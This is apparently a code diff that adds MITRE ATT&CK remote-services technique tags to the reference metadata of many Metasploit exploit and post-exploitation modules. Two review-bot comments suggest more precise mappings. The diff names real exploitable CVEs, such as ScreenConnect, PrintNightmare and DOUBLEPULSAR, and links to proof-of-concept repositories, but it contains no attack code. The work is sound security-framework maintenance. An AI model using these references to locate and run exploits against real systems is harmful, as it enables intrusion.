'Privileged' => false, # `NT AUTHORITY\NETWORK SERVICE` on Windows by default, `confluence` on Linux by default.
|
||||
|
||||
@@ -31,7 +31,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
['CVE', '2024-1709'], # Auth bypass to create admin account.
|
||||
['URL', 'https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8'], # Vendor Advisory
|
||||
['URL', 'https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc/'], # Auth Bypass PoC
|
||||
['URL', 'https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass'] # Analysis of both CVEs
|
||||
['URL', 'https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass'], # Analysis of both CVEs
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
|
||||
],
|
||||
'DisclosureDate' => '2024-02-19',
|
||||
'Platform' => %w[win linux unix],
|
||||
|
||||
@@ -35,7 +35,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
],
|
||||
'References' => [
|
||||
['CVE', '2011-0807'],
|
||||
['OSVDB', '71948']
|
||||
['OSVDB', '71948'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
|
||||
],
|
||||
'Platform' => ['win', 'linux', 'java'],
|
||||
'Targets' => [
|
||||
|
||||
@@ -27,7 +27,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
['CVE', '2017-11467'],
|
||||
['URL', 'https://blogs.securiteam.com/index.php/archives/3318'],
|
||||
['URL', 'http://www.palada.net/index.php/2017/07/13/news-2112/'],
|
||||
['URL', 'https://github.com/orientechnologies/orientdb/wiki/OrientDB-2.2-Release-Notes#2223---july-11-2017']
|
||||
['URL', 'https://github.com/orientechnologies/orientdb/wiki/OrientDB-2.2-Release-Notes#2223---july-11-2017'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
|
||||
],
|
||||
'Platform' => %w{linux unix win},
|
||||
'Privileged' => false,
|
||||
|
||||
@@ -32,7 +32,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
[ 'BID', '51061' ],
|
||||
[ 'CVE', '2011-4642' ],
|
||||
[ 'URL', 'http://www.splunk.com/view/SP-CAAAGMM' ],
|
||||
[ 'URL', 'http://www.sec-1.com/blog/?p=233' ]
|
||||
[ 'URL', 'http://www.sec-1.com/blog/?p=233' ],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
|
||||
],
|
||||
'Payload' => {
|
||||
'Space' => 1024,
|
||||
|
||||
@@ -57,7 +57,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
[ 'BID', '36954' ],
|
||||
|
||||
# tomcat docs
|
||||
[ 'URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html' ]
|
||||
[ 'URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html' ],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
|
||||
],
|
||||
'Platform' => %w{java linux win}, # others?
|
||||
'Targets' => [
|
||||
|
||||
@@ -31,7 +31,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
['URL', 'https://nickbloor.co.uk/2018/01/01/rce-with-bmc-server-automation/'],
|
||||
['URL', 'https://nickbloor.co.uk/2018/01/08/improving-the-bmc-rscd-rce-exploit/'],
|
||||
['CVE', '2016-1542'],
|
||||
['CVE', '2016-1543']
|
||||
['CVE', '2016-1543'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
|
||||
],
|
||||
'DisclosureDate' => '2016-03-16',
|
||||
'Privileged' => false,
|
||||
|
||||
@@ -21,7 +21,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
),
|
||||
'Author' => ['Spencer McIntyre', 'Brandon Knight'],
|
||||
'References' => [
|
||||
[ 'CVE', '1999-0502'] # Weak password
|
||||
[ 'CVE', '1999-0502'], # Weak password
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Privileged' => true,
|
||||
|
||||
@@ -34,7 +34,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
[ 'VNC Linux / Unix', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ]
|
||||
],
|
||||
'References' => [
|
||||
[ 'URL', 'http://www.jedi.be/blog/2010/08/29/sending-keystrokes-to-your-virtual-machines-using-X-vnc-rdp-or-native/']
|
||||
[ 'URL', 'http://www.jedi.be/blog/2010/08/29/sending-keystrokes-to-your-virtual-machines-using-X-vnc-rdp-or-native/'],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_005_VNC ]
|
||||
],
|
||||
'DisclosureDate' => '2015-07-10',
|
||||
'DefaultTarget' => 0,
|
||||
|
||||
@@ -22,7 +22,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'Author' => ['Chokri Hammedi (@blue0x1)'],
|
||||
'References' => [
|
||||
['CVE', '2025-34089'],
|
||||
['PACKETSTORM', '195347']
|
||||
['PACKETSTORM', '195347'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
|
||||
],
|
||||
'DisclosureDate' => '2025-05-27',
|
||||
'Platform' => ['unix', 'osx'],
|
||||
|
||||
@@ -23,6 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
[ 'CVE', '2007-0882' ],
|
||||
[ 'OSVDB', '31881'],
|
||||
[ 'BID', '22512' ],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ],
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Platform' => %w[solaris unix],
|
||||
|
||||
@@ -23,6 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
['CVE', '2001-0797'],
|
||||
['OSVDB', '690'],
|
||||
['BID', '5531'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES],
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Platform' => %w[solaris unix],
|
||||
|
||||
@@ -33,7 +33,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
['CVE', '2012-5975'],
|
||||
['EDB', '23082'],
|
||||
['OSVDB', '88103'],
|
||||
['URL', 'https://seclists.org/fulldisclosure/2012/Dec/12']
|
||||
['URL', 'https://seclists.org/fulldisclosure/2012/Dec/12'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
|
||||
],
|
||||
'Payload' => {
|
||||
'Compat' =>
|
||||
|
||||
@@ -61,7 +61,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
['URL', 'https://github.com/cube0x0/CVE-2021-1675'],
|
||||
['URL', 'https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare'],
|
||||
['URL', 'https://github.com/calebstewart/CVE-2021-1675/blob/main/CVE-2021-1675.ps1'],
|
||||
['URL', 'https://github.com/byt3bl33d3r/ItWasAllADream']
|
||||
['URL', 'https://github.com/byt3bl33d3r/ItWasAllADream'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES]
|
||||
],
|
||||
'Notes' => {
|
||||
'AKA' => [ 'PrintNightmare' ],
|
||||
|
||||
@@ -30,7 +30,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
],
|
||||
'References' => [
|
||||
['CVE', '2025-34079'],
|
||||
['EDB', '48360']
|
||||
['EDB', '48360'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
|
||||
],
|
||||
'Platform' => %w[windows],
|
||||
'Arch' => [ARCH_X64],
|
||||
|
||||
@@ -29,7 +29,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'License' => MSF_LICENSE,
|
||||
'References' => [
|
||||
['CVE', '2007-1373'],
|
||||
['EDB', '3418']
|
||||
['EDB', '3418'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DefaultOptions' => {
|
||||
|
||||
@@ -22,7 +22,8 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
'Author' => [ 'Ben Campbell' ],
|
||||
'References' => [
|
||||
[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
|
||||
[ 'OSVDB', '3106']
|
||||
[ 'OSVDB', '3106'],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_006_WINDOWS_REMOTE_MANAGEMENT ]
|
||||
],
|
||||
'DefaultOptions' => {
|
||||
'EXITFUNC' => 'thread'
|
||||
|
||||
@@ -37,6 +37,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
|
||||
[ 'OSVDB', '3106'],
|
||||
[ 'URL', 'http://passing-the-hash.blogspot.co.uk/2013/07/WMIS-PowerSploit-Shells.html' ],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ],
|
||||
],
|
||||
'DefaultOptions' => {
|
||||
'EXITFUNC' => 'thread',
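Review bot: The parent technique `T1021_REMOTE_SERVICES` on the added line is less specific than the hunk's own context suggests. The URL reference directly above it points to WMIS shells, and ATT&CK tracks Windows Management Instrumentation separately as `T1047`. If the module body, which is outside this hunk, does execute over WMI, referencing the T1047 entry instead of or alongside the generic parent would give a more useful mapping for detection coverage. This should be checked against the module description before merging.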
|
||||
|
||||
@@ -37,7 +37,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
[ 'EDB', '49587' ],
|
||||
[ 'URL', 'https://www.unifiedremote.com/' ],
|
||||
[ 'URL', 'https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/unified%20remote/unified-remote-rce.py' ],
|
||||
[ 'CVE', '2022-3229' ]
|
||||
[ 'CVE', '2022-3229' ],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
|
||||
],
|
||||
'Arch' => [ ARCH_X64, ARCH_X86 ],
|
||||
'Platform' => 'win',
|
||||
|
||||
@@ -95,7 +95,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
['URL', 'https://github.com/zerosum0x0/CVE-2019-0708'],
|
||||
['URL', 'https://zerosum0x0.blogspot.com/2019/11/fixing-remote-windows-kernel-payloads-meltdown.html'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1059_COMMAND_AND_SCRIPTING_INTERPRETER],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1068_EXPLOITATION_FOR_PRIVILEGE_ESCALATION]
|
||||
['ATT&CK', Mitre::Attack::Technique::T1068_EXPLOITATION_FOR_PRIVILEGE_ESCALATION],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_001_REMOTE_DESKTOP_PROTOCOL]
|
||||
],
|
||||
'DefaultOptions' => {
|
||||
'RDP_CLIENT_NAME' => 'ethdev',
|
||||
|
||||
@@ -32,7 +32,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'Spencer McIntyre' # RDP DOPU analysis
|
||||
],
|
||||
'References' => [
|
||||
['URL', 'https://github.com/countercept/doublepulsar-detection-script']
|
||||
['URL', 'https://github.com/countercept/doublepulsar-detection-script'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_001_REMOTE_DESKTOP_PROTOCOL]
|
||||
],
|
||||
'DisclosureDate' => '2017-04-14', # Shadow Brokers leak
|
||||
'License' => MSF_LICENSE,
|
||||
|
||||
@@ -44,7 +44,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
[ 'URL', 'https://www.youtube.com/watch?v=RSV3f6aEJFY&t=1865s' ],
|
||||
[ 'URL', 'https://www.coresecurity.com/core-labs/articles/getting-physical-extreme-abuse-of-intel-based-paging-systems' ],
|
||||
[ 'URL', 'https://www.coresecurity.com/core-labs/articles/getting-physical-extreme-abuse-of-intel-based-paging-systems-part-2-windows' ],
|
||||
[ 'URL', 'https://labs.bluefrostsecurity.de/blog/2017/05/11/windows-10-hals-heap-extinction-of-the-halpinterruptcontroller-table-exploitation-technique/' ]
|
||||
[ 'URL', 'https://labs.bluefrostsecurity.de/blog/2017/05/11/windows-10-hals-heap-extinction-of-the-halpinterruptcontroller-table-exploitation-technique/' ],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ]
|
||||
],
|
||||
'DefaultOptions' => {
|
||||
'EXITFUNC' => 'thread',
|
||||
|
||||
@@ -30,6 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
[ 'OSVDB', '117423' ],
|
||||
[ 'BID', '72265' ],
|
||||
[ 'URL', 'http://codewhitesec.blogspot.de/2015/02/how-i-could-ipass-your-client-security.html' ],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ],
|
||||
],
|
||||
'DefaultOptions' => {
|
||||
'EXITFUNC' => 'process',
|
||||
|
||||
@@ -47,7 +47,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],
|
||||
['URL', 'https://github.com/countercept/doublepulsar-detection-script'],
|
||||
['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],
|
||||
['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']
|
||||
['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
|
||||
],
|
||||
'DisclosureDate' => '2017-04-14', # Shadow Brokers leak
|
||||
'License' => MSF_LICENSE,
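Review bot: The added line uses the parent `T1021_REMOTE_SERVICES`, whereas the other DOUBLEPULSAR hunk in this commit (the one credited with "RDP DOPU analysis") uses the sub-technique `T1021_001_REMOTE_DESKTOP_PROTOCOL`. If this module is the SMB counterpart, which the hunk does not show, `['ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES]` would keep the two mappings at the same level of detail. Otherwise a trailing comment on the line explaining why the parent technique was chosen would help later readers.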
|
||||
|
||||
@@ -83,7 +83,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
['MSB', 'MS08-068'],
|
||||
['URL', 'http://blogs.technet.com/swi/archive/2008/11/11/smb-credential-reflection.aspx'],
|
||||
['URL', 'https://en.wikipedia.org/wiki/SMBRelay'],
|
||||
['URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx']
|
||||
['URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES]
|
||||
],
|
||||
'Arch' => [ARCH_X86, ARCH_X64],
|
||||
'Platform' => 'win',
|
||||
|
||||
@@ -38,7 +38,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'Privileged' => true,
|
||||
'Payload' => {},
|
||||
'References' => [
|
||||
['URL', 'https://strontium.io/blog/introducing-windows-10-smb-shadow-attack']
|
||||
['URL', 'https://strontium.io/blog/introducing-windows-10-smb-shadow-attack'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES]
|
||||
],
|
||||
'Arch' => [ARCH_X86, ARCH_X64],
|
||||
'Platform' => 'win',
|
||||
|
||||
@@ -32,7 +32,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
['OSVDB', '88006'],
|
||||
['BID', '56785'],
|
||||
['URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0012.html'],
|
||||
['URL', 'https://seclists.org/fulldisclosure/2010/Aug/132']
|
||||
['URL', 'https://seclists.org/fulldisclosure/2010/Aug/132'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
|
||||
],
|
||||
'Platform' => 'win',
|
||||
'Privileged' => true,
|
||||
|
||||
@@ -28,6 +28,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'License' => MSF_LICENSE,
|
||||
'References' => [
|
||||
[ 'URL', 'http://msdn.microsoft.com/en-us/library/windows/desktop/aa384426(v=vs.85).aspx' ],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_006_WINDOWS_REMOTE_MANAGEMENT ],
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DefaultOptions' => {
|
||||
|
||||
@@ -37,7 +37,10 @@ class MetasploitModule < Msf::Post
|
||||
stdapi_fs_separator
|
||||
]
|
||||
}
|
||||
}
|
||||
},
|
||||
'References' => [
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
|
||||
]
|
||||
)
|
||||
)
|
||||
|
||||
|
||||
@@ -23,7 +23,10 @@ class MetasploitModule < Msf::Post
|
||||
'Stability' => [CRASH_SAFE],
|
||||
'SideEffects' => [],
|
||||
'Reliability' => []
|
||||
}
|
||||
},
|
||||
'References' => [
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_005_VNC ]
|
||||
]
|
||||
)
|
||||
)
|
||||
end
|
||||
|
||||
@@ -33,7 +33,12 @@ class MetasploitModule < Msf::Post
|
||||
'Stability' => [CRASH_SAFE],
|
||||
'SideEffects' => [],
|
||||
'Reliability' => []
|
||||
}
|
||||
},
|
||||
'References' => [
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_001_REMOTE_DESKTOP_PROTOCOL ],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_005_VNC ],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]
|
||||
]
|
||||
)
|
||||
)
|
||||
end
|
||||
|
||||
@@ -51,7 +51,10 @@ class MetasploitModule < Msf::Post
|
||||
stdapi_sys_process_memory_write
|
||||
]
|
||||
}
|
||||
}
|
||||
},
|
||||
'References' => [
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
|
||||
]
|
||||
)
|
||||
)
|
||||
end
|
||||
|
||||
@@ -28,7 +28,10 @@ class MetasploitModule < Msf::Post
|
||||
'Stability' => [CRASH_SAFE],
|
||||
'SideEffects' => [CONFIG_CHANGES],
|
||||
'Reliability' => []
|
||||
}
|
||||
},
|
||||
'References' => [
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_001_REMOTE_DESKTOP_PROTOCOL ]
|
||||
]
|
||||
)
|
||||
)
|
||||
|
||||
|
||||
@@ -43,7 +43,10 @@ class MetasploitModule < Msf::Post
|
||||
extapi_pageant_send_query
|
||||
]
|
||||
}
|
||||
}
|
||||
},
|
||||
'References' => [
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]
|
||||
]
|
||||
)
|
||||
)
|
||||
register_options([
|
||||
|
||||
@@ -24,7 +24,8 @@ class MetasploitModule < Msf::Post
|
||||
'SessionTypes' => [ 'meterpreter', 'shell' ],
|
||||
'References' => [
|
||||
['URL', 'https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_overview'],
|
||||
['URL', 'https://github.com/PowerShell/openssh-portable']
|
||||
['URL', 'https://github.com/PowerShell/openssh-portable'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
|
||||
],
|
||||
'Notes' => {
|
||||
'Stability' => [CRASH_SAFE],
|
||||
|
||||
@@ -22,7 +22,8 @@ class MetasploitModule < Msf::Post
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => 'Borja Merino <bmerinofe[at]gmail.com>',
|
||||
'References' => [
|
||||
[ 'URL', 'https://www.youtube.com/watch?v=vdppEZjMPCM&hd=1' ]
|
||||
[ 'URL', 'https://www.youtube.com/watch?v=vdppEZjMPCM&hd=1' ],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
|
||||
],
|
||||
'Platform' => 'win',
|
||||
'SessionTypes' => [ 'meterpreter' ],
|
||||
|
||||
@@ -38,7 +38,10 @@ class MetasploitModule < Msf::Post
|
||||
'Stability' => [CRASH_SAFE],
|
||||
'SideEffects' => [ARTIFACTS_ON_DISK],
|
||||
'Reliability' => []
|
||||
}
|
||||
},
|
||||
'References' => [
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]
|
||||
]
|
||||
)
|
||||
)
|
||||
|
||||
|
||||